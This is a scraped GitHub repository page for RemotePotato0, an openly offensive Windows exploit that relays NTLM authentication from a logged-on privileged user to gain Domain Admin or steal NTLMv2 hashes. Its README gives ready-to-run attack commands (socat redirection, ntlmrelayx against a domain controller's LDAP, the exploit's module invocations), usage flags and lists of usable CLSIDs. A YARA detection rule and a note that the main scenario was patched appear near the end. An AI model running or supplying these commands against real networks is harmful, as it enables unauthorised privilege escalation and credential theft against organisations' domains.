Skip to content

antonioCoco/RemotePotato0

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
2 branches 3 tags
Code

Latest commit

@antonioCoco
antonioCoco Update README.md
e7ae9d4 Dec 18, 2022
Update README.md
e7ae9d4

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
network_capture_pcap
this close #1
May 1, 2021 11:42
.gitignore
Initial commit
February 8, 2021 23:02
HTTPCrossProtocolRelay.cpp
added rpc capture server hashes and code refactor
August 1, 2021 19:57
HTTPCrossProtocolRelay.h
added rpc capture server hashes and code refactor
August 1, 2021 19:57
IStandardActivator.idl
refactored cross session activation code
July 24, 2021 19:53
IStandardActivator_h.h
refactored cross session activation code
July 24, 2021 19:53
IStorageTrigger.cpp
added JuicyPotato way for oxid resolutions on servers pre 2019
July 25, 2021 21:39
IStorageTrigger.h
RemotePotato0 released
February 8, 2021 23:04
LICENSE
Initial commit
February 8, 2021 23:02
README.md
Update README.md
December 18, 2022 02:52
RPCCaptureServer.cpp
code refactor - renaming ntlmv2 offsets constants
August 6, 2021 13:26
RPCCaptureServer.h
added rpc capture server hashes and code refactor
August 1, 2021 19:57
RelayLib.cpp
added rpc capture server hashes and code refactor
August 1, 2021 19:57
RelayLib.h
added rpc capture server hashes and code refactor
August 1, 2021 19:57
RemotePotato0.cpp
changed text
August 6, 2021 13:35
RemotePotato0.sln
RemotePotato0 released
February 8, 2021 23:04
RemotePotato0.vcxproj
added rpc capture server hashes and code refactor
August 1, 2021 19:57
RemotePotato0.vcxproj.filters
added rpc capture server hashes and code refactor
August 1, 2021 19:57
RogueOxidResolver.cpp
code refactor for commandline to prepare for new features
August 1, 2021 01:17
RogueOxidResolver.h
RemotePotato0 released
February 8, 2021 23:04
RogueOxidResolver.idl
refactored cross session activation code
July 24, 2021 19:53
RogueOxidResolver_c.c
recompiled oxid resolver idl
July 29, 2021 00:35
RogueOxidResolver_h.h
refactored cross session activation code
July 24, 2021 19:53
RogueOxidResolver_s.c
recompiled oxid resolver idl
July 29, 2021 00:35
demo_cross_session.gif
added demo cross session activation
August 6, 2021 16:15
demo_hash_stealer.gif
added demo gif hash stealer
August 6, 2021 15:26
RemotePotato0 Examples Module 0 - Rpc2Http cross protocol relay server + potato trigger Module 1 - Rpc2Http cross protocol relay server Module 2 - Rpc capture (hash) server + potato trigger Module 3 - Rpc capture (hash) server Usage Demo Cross session activation Hash Stealer CLSID List Detection Authors Credits References

README.md

RemotePotato0

UPDATE 21-10-2022: The main exploit scenario RPC->LDAP of RemotePotato0 has been fixed. More details at --> https://twitter.com/splinter_code/status/1583555613950255104

Just another "Won't Fix" Windows Privilege Escalation from User to Domain Admin.

RemotePotato0 is an exploit that allows you to escalate your privileges from a generic User to Domain Admin.

Briefly:

It abuses the DCOM activation service and trigger an NTLM authentication of any user currently logged on in the target machine. It is required that a privileged user is logged on the same machine (e.g. a Domain Admin user). Once the NTLM type1 is triggered we setup a cross protocol relay server that receive the privileged type1 message and relay it to a third resource by unpacking the RPC protocol and packing the authentication over HTTP. On the receiving end you can setup a further relay node (eg. ntlmrelayx) or relay directly to a privileged resource. RemotePotato0 also allows to grab and steal NTLMv2 hashes of every users logged on a machine.

Examples

Attacker machine (10.0.0.20)

Victim machine (10.0.0.45)

Victim Domain Controller (10.0.0.10)

Module 0 - Rpc2Http cross protocol relay server + potato trigger

sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.0.0.45:9999 &
sudo ntlmrelayx.py -t ldap://10.0.0.10 --no-wcf-server --escalate-user normal_user

Note: if you are on Windows Server <= 2016 you can avoid the network redirector (socat) because the oxid resolution can be performed locally.

query user
.\RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1

Module 1 - Rpc2Http cross protocol relay server

.\RemotePotato0.exe -m 1 -l 9997 -r 10.0.0.20 

rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm

Module 2 - Rpc capture (hash) server + potato trigger

query user
.\RemotePotato0.exe -m 2 -s 1

Module 3 - Rpc capture (hash) server

.\RemotePotato0.exe -m 3 -l 9997

rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm

Usage



        RemotePotato0
        @splinter_code & @decoder_it



Mandatory args:
-m module
        Allowed values:
        0 - Rpc2Http cross protocol relay server + potato trigger (default)
        1 - Rpc2Http cross protocol relay server
        2 - Rpc capture (hash) server + potato trigger
        3 - Rpc capture (hash) server


Other args: (someone could be mandatory and/or optional based on the module you use)
-r Remote HTTP relay server ip
-t Remote HTTP relay server port (Default 80)
-x Rogue Oxid Resolver ip (default 127.0.0.1)
-p Rogue Oxid Resolver port (default 9999)
-l RPC Relay server listening port (Default 9997)
-s Session id for the Cross Session Activation attack (default disabled)
-c CLSID (Default {5167B42F-C111-47A1-ACC4-8EABE61B0B54})

Demo

Cross session activation

Hash Stealer

CLSID List

A list of usable CLSID on various Windows version:

Windows Server 2019

{0002DF02-0000-0000-C000-000000000046} - BrowserBroker Class   
{0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4} - AuthBrokerUI 
{5167B42F-C111-47A1-ACC4-8EABE61B0B54} - Easconsent.dll 
{924DC564-16A6-42EB-929A-9A61FA7DA06F} - Authentication UI CredUI Out of Proc Helper for Non-AppContainer Clients  
{934b410c-43e4-415e-9935-fbc081ba93a9} - UserInfoDialog   
{BA441419-0B3F-4FB6-A903-D16CC14CCA44} - CLSID_LockScreenContentionFlyout 
{c58ca859-80bc-48df-8f06-ffa94a405bff} - Picker Host   
{f65817c8-dd85-4136-89f0-b9d12939f2c4} - IsolatedMessageDialogFactory  
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} - SPPUIObjectInteractive Class
{f8842f8e-dafe-4b37-9d38-4e0714a61149} - CastServerInteractiveUser

Windows Server 2016

{924DC564-16A6-42EB-929A-9A61FA7DA06F}
{f65817c8-dd85-4136-89f0-b9d12939f2c4}
{BA441419-0B3F-4FB6-A903-D16CC14CCA44}
{0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4}
{934b410c-43e4-415e-9935-fbc081ba93a9}
{f8842f8e-dafe-4b37-9d38-4e0714a61149}
{0002DF02-0000-0000-C000-000000000046}
{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
{c58ca859-80bc-48df-8f06-ffa94a405bff}
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}

Windows Server 2008 R2

{FCC74B77-EC3E-4dd8-A80B-008A702075A9}
{9BA05972-F6A8-11CF-A442-00A0C90A8F39}
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}

You can find a more complete list here --> http://ohpe.it/juicy-potato/CLSID/

Detection

Yara rule to detect RemotePotato0 binary:

rule SentinelOne_RemotePotato0_privesc {
    meta:
        author = "SentinelOne"
        description = "Detects RemotePotato0 binary"
        reference = "https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop"
        
    strings:
        $import1 = "CoGetInstanceFromIStorage"
        $istorage_clsid = "{00000306-0000-0000-c000-000000000046}" nocase wide ascii
        $meow_header = { 4d 45 4f 57 }
        $clsid1 = "{11111111-2222-3333-4444-555555555555}" nocase wide ascii
        $clsid2 = "{5167B42F-C111-47A1-ACC4-8EABE61B0B54}" nocase wide ascii
        
    condition:        
        (uint16(0) == 0x5A4D) and $import1 and $istorage_clsid and $meow_header and 1 of ($clsid*)
}

Authors

Credits

References

About

Windows Privilege Escalation from User to Domain Admin.

Resources

Readme

License

MIT license

Stars

1.2k stars

Watchers

31 watching

Forks

195 forks
Report repository

Releases 3

RemotePotato0 v 1.2 Latest
Aug 6, 2021
+ 2 releases

Packages

No packages published

Languages